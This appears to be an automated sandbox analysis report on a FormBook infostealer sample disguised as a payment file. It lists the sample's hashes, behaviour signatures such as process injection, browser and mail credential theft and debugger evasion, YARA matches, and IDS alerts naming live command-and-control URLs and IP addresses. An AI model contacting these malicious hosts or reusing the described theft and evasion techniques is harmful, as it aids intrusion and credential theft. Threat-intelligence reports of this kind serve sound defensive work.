Windows Analysis Report
PAGO $830.900.exe

Overview

General Information

Sample name: PAGO $830.900.exe
Analysis ID: 1513227
MD5: 39c39d298ac66acb85c47e7a647bac4e
SHA1: a2d7ec0eaa52cd8287926c198052dbd99e7366a1
SHA256: 79a2f729b9a56bea58b706b9246e46d6204ae30c549fdbe6bc044e80624947e3

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • PAGO $830.900.exe (PID: 5040 cmdline: "C:\Users\user\Desktop\PAGO $830.900.exe" MD5: 39C39D298AC66ACB85C47E7A647BAC4E)
    • svchost.exe (PID: 768 cmdline: "C:\Users\user\Desktop\PAGO $830.900.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • XXOIkqUXwzoOEy.exe (PID: 3012 cmdline: "C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 3748 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • XXOIkqUXwzoOEy.exe (PID: 1788 cmdline: "C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1600 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000004.00000002.4479452466.0000000003220000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | -
00000004.00000002.4479452466.0000000003220000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown | strings:
  • 0x2bd00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13f2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.4482452521.0000000004C80000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | -
00000006.00000002.4482452521.0000000004C80000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown | strings:
  • 0x399e2:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x21c11:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4479040765.0000000002D80000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | -
Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | -
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown | strings:
  • 0x2df63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16192:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | -
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown | strings:
  • 0x2ed63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16f92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\PAGO $830.900.exe", CommandLine: "C:\Users\user\Desktop\PAGO $830.900.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PAGO $830.900.exe", ParentImage: C:\Users\user\Desktop\PAGO $830.900.exe, ParentProcessId: 5040, ParentProcessName: PAGO $830.900.exe, ProcessCommandLine: "C:\Users\user\Desktop\PAGO $830.900.exe", ProcessId: 768, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\PAGO $830.900.exe", CommandLine: "C:\Users\user\Desktop\PAGO $830.900.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PAGO $830.900.exe", ParentImage: C:\Users\user\Desktop\PAGO $830.900.exe, ParentProcessId: 5040, ParentProcessName: PAGO $830.900.exe, ProcessCommandLine: "C:\Users\user\Desktop\PAGO $830.900.exe", ProcessId: 768, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-18T16:18:05.577568+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 53614 | 148.72.152.174 | 80 | TCP
2024-09-18T16:18:29.917543+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 53618 | 3.33.130.190 | 80 | TCP
2024-09-18T16:18:43.557979+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 53622 | 172.191.244.62 | 80 | TCP
2024-09-18T16:18:57.440579+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 53626 | 172.96.191.39 | 80 | TCP
2024-09-18T16:19:11.055033+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 53630 | 217.70.184.50 | 80 | TCP
2024-09-18T16:19:25.013615+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 53634 | 63.250.47.40 | 80 | TCP
2024-09-18T16:19:38.348985+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 53638 | 91.184.0.200 | 80 | TCP
2024-09-18T16:19:51.502607+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 53642 | 13.248.169.48 | 80 | TCP
2024-09-18T16:20:19.922706+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 53650 | 43.242.202.169 | 80 | TCP
2024-09-18T16:20:34.796371+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 53654 | 103.224.182.242 | 80 | TCP
2024-09-18T16:20:48.479195+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 53658 | 85.159.66.93 | 80 | TCP
2024-09-18T16:21:02.598834+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 53662 | 188.114.97.3 | 80 | TCP
2024-09-18T16:21:16.091718+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 53666 | 13.248.169.48 | 80 | TCP
2024-09-18T16:21:45.848266+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 53670 | 148.72.152.174 | 80 | TCP
2024-09-18T16:21:58.973358+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 53674 | 3.33.130.190 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-18T16:18:05.577568+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 53614 | 148.72.152.174 | 80 | TCP
2024-09-18T16:18:29.917543+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 53618 | 3.33.130.190 | 80 | TCP
2024-09-18T16:18:43.557979+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 53622 | 172.191.244.62 | 80 | TCP
2024-09-18T16:18:57.440579+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 53626 | 172.96.191.39 | 80 | TCP
2024-09-18T16:19:11.055033+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 53630 | 217.70.184.50 | 80 | TCP
2024-09-18T16:19:25.013615+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 53634 | 63.250.47.40 | 80 | TCP
2024-09-18T16:19:38.348985+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 53638 | 91.184.0.200 | 80 | TCP
2024-09-18T16:19:51.502607+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 53642 | 13.248.169.48 | 80 | TCP
2024-09-18T16:20:19.922706+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 53650 | 43.242.202.169 | 80 | TCP
2024-09-18T16:20:34.796371+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 53654 | 103.224.182.242 | 80 | TCP
2024-09-18T16:20:48.479195+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 53658 | 85.159.66.93 | 80 | TCP
2024-09-18T16:21:02.598834+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 53662 | 188.114.97.3 | 80 | TCP
2024-09-18T16:21:16.091718+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 53666 | 13.248.169.48 | 80 | TCP
2024-09-18T16:21:45.848266+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 53670 | 148.72.152.174 | 80 | TCP
2024-09-18T16:21:58.973358+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 53674 | 3.33.130.190 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-18T16:18:21.156053+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53615 | 3.33.130.190 | 80 | TCP
2024-09-18T16:18:24.120594+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53616 | 3.33.130.190 | 80 | TCP
2024-09-18T16:18:26.381761+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53617 | 3.33.130.190 | 80 | TCP
2024-09-18T16:18:35.831964+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53619 | 172.191.244.62 | 80 | TCP
2024-09-18T16:18:38.680882+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53620 | 172.191.244.62 | 80 | TCP
2024-09-18T16:18:41.008552+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53621 | 172.191.244.62 | 80 | TCP
2024-09-18T16:18:49.784798+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53623 | 172.96.191.39 | 80 | TCP
2024-09-18T16:18:52.296428+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53624 | 172.96.191.39 | 80 | TCP
2024-09-18T16:18:54.881727+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53625 | 172.96.191.39 | 80 | TCP
2024-09-18T16:19:03.216710+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53627 | 217.70.184.50 | 80 | TCP
2024-09-18T16:19:05.792242+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53628 | 217.70.184.50 | 80 | TCP
2024-09-18T16:19:08.348795+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53629 | 217.70.184.50 | 80 | TCP
2024-09-18T16:19:17.368469+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53631 | 63.250.47.40 | 80 | TCP
2024-09-18T16:19:19.914771+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53632 | 63.250.47.40 | 80 | TCP
2024-09-18T16:19:22.516389+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53633 | 63.250.47.40 | 80 | TCP
2024-09-18T16:19:30.690959+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53635 | 91.184.0.200 | 80 | TCP
2024-09-18T16:19:33.214822+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53636 | 91.184.0.200 | 80 | TCP
2024-09-18T16:19:35.871779+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53637 | 91.184.0.200 | 80 | TCP
2024-09-18T16:19:43.847494+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53639 | 13.248.169.48 | 80 | TCP
2024-09-18T16:19:46.397678+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53640 | 13.248.169.48 | 80 | TCP
2024-09-18T16:19:48.946030+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53641 | 13.248.169.48 | 80 | TCP
2024-09-18T16:20:11.912872+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53647 | 43.242.202.169 | 80 | TCP
2024-09-18T16:20:14.674893+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53648 | 43.242.202.169 | 80 | TCP
2024-09-18T16:20:17.276409+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53649 | 43.242.202.169 | 80 | TCP
2024-09-18T16:20:26.996004+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53651 | 103.224.182.242 | 80 | TCP
2024-09-18T16:20:29.401854+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53652 | 103.224.182.242 | 80 | TCP
2024-09-18T16:20:32.377082+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53653 | 103.224.182.242 | 80 | TCP
2024-09-18T16:20:41.459514+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53655 | 85.159.66.93 | 80 | TCP
2024-09-18T16:20:44.006797+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53656 | 85.159.66.93 | 80 | TCP
2024-09-18T16:20:46.552932+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53657 | 85.159.66.93 | 80 | TCP
2024-09-18T16:20:54.781314+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53659 | 188.114.97.3 | 80 | TCP
2024-09-18T16:20:57.207720+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53660 | 188.114.97.3 | 80 | TCP
2024-09-18T16:20:59.708283+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53661 | 188.114.97.3 | 80 | TCP
2024-09-18T16:21:08.364978+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53663 | 13.248.169.48 | 80 | TCP
2024-09-18T16:21:10.922448+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53664 | 13.248.169.48 | 80 | TCP
2024-09-18T16:21:13.470593+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53665 | 13.248.169.48 | 80 | TCP
2024-09-18T16:21:38.233370+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53667 | 148.72.152.174 | 80 | TCP
2024-09-18T16:21:40.764371+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53668 | 148.72.152.174 | 80 | TCP
2024-09-18T16:21:43.352378+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53669 | 148.72.152.174 | 80 | TCP
2024-09-18T16:21:51.341563+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53671 | 3.33.130.190 | 80 | TCP
2024-09-18T16:21:54.000396+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53672 | 3.33.130.190 | 80 | TCP
2024-09-18T16:21:56.455893+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53673 | 3.33.130.190 | 80 | TCP


            AV Detection

Source: http://www.omexai.info/7xi5/?x0wHoJ8X=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELNT/uLCDt5nHY4Z1aiDsGH/lUra2tZ4EmQmJJAAh8o7sfXQ==&2VDlJ=Z2VdhTx | Avira URL Cloud: Label: malware
Source: http://www.elsupertodo.net/2jit/?x0wHoJ8X=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1fIExehuCYopzYdrD7nSEUYrIRB0qkneaQhNiSOa9oBZv5w==&2VDlJ=Z2VdhTx | Avira URL Cloud: Label: malware
Source: http://www.elsupertodo.net/2jit/ | Avira URL Cloud: Label: malware
Source: http://www.tekilla.wtf/fpzw/ | Avira URL Cloud: Label: malware
Source: http://www.omexai.info/7xi5/ | Avira URL Cloud: Label: malware
Source: http://www.tekilla.wtf/fpzw/?2VDlJ=Z2VdhTx&x0wHoJ8X=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyV8YvjGskVquY7O4GS1YJERNPT4cclYTval7UCV/4UAiTeAA== | Avira URL Cloud: Label: malware
Source: https://www.elsupertodo.net/2jit/?x0wHoJ8X=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle | Avira URL Cloud: Label: malware
Source: PAGO $830.900.exe | ReversingLabs: Detection: 62%
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.4479452466.0000000003220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4482452521.0000000004C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4479040765.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4480467614.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2236251136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2237968521.0000000003E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2238057070.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4480505595.0000000004270000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: PAGO $830.900.exe | Joe Sandbox ML: detected
Source: PAGO $830.900.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: XXOIkqUXwzoOEy.exe, 00000003.00000000.2155456066.00000000006BE000.00000002.00000001.01000000.00000004.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4479745513.00000000006BE000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP | source: PAGO $830.900.exe, 00000000.00000003.2045771670.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, PAGO $830.900.exe, 00000000.00000003.2045918029.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2137653598.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2237383010.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2237383010.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2139562708.0000000003900000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2239500272.0000000003703000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2236327251.000000000355E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4480765561.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4480765561.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: PAGO $830.900.exe, 00000000.00000003.2045771670.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, PAGO $830.900.exe, 00000000.00000003.2045918029.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2137653598.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2237383010.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2237383010.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2139562708.0000000003900000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000003.2239500272.0000000003703000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2236327251.000000000355E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4480765561.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4480765561.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: netbtugc.pdb | source: svchost.exe, 00000002.00000002.2236959150.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2204810568.000000000341A000.00000004.00000020.00020000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000003.00000002.4479988906.0000000000748000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb | source: netbtugc.exe, 00000004.00000002.4479582993.00000000032AE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4481211759.0000000003EDC000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.000000000284C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2631846308.0000000010E8C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP | source: netbtugc.exe, 00000004.00000002.4479582993.00000000032AE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4481211759.0000000003EDC000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.000000000284C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2631846308.0000000010E8C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: netbtugc.pdbGCTL | source: svchost.exe, 00000002.00000002.2236959150.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2204810568.000000000341A000.00000004.00000020.00020000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000003.00000002.4479988906.0000000000748000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DDDADC lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose | 0_2_00DDDADC
Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DAC242 FindFirstFileExW | 0_2_00DAC242
Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DE68AD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime | 0_2_00DE68AD
Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DE680C FindFirstFileW,FindClose | 0_2_00DE680C
Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DDCF94 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_00DDCF94
Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DDD2C7 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_00DDD2C7
Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DE9560 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00DE9560
Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DE96BB SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00DE96BB
Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DE9A49 FindFirstFileW,Sleep,FindNextFileW,FindClose | 0_2_00DE9A49
Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DE5BB5 FindFirstFileW,FindNextFileW,FindClose | 0_2_00DE5BB5
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02D9C2C0 FindFirstFileW,FindNextFileW,FindClose | 4_2_02D9C2C0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then xor eax, eax | 4_2_02D89B90
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then pop edi | 4_2_02DA2399
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then mov ebx, 00000004h | 4_2_036004DE

            Networking

Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53623 -> 172.96.191.39:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53655 -> 85.159.66.93:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53619 -> 172.191.244.62:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53660 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53648 -> 43.242.202.169:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53625 -> 172.96.191.39:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53615 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53640 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53656 -> 85.159.66.93:80
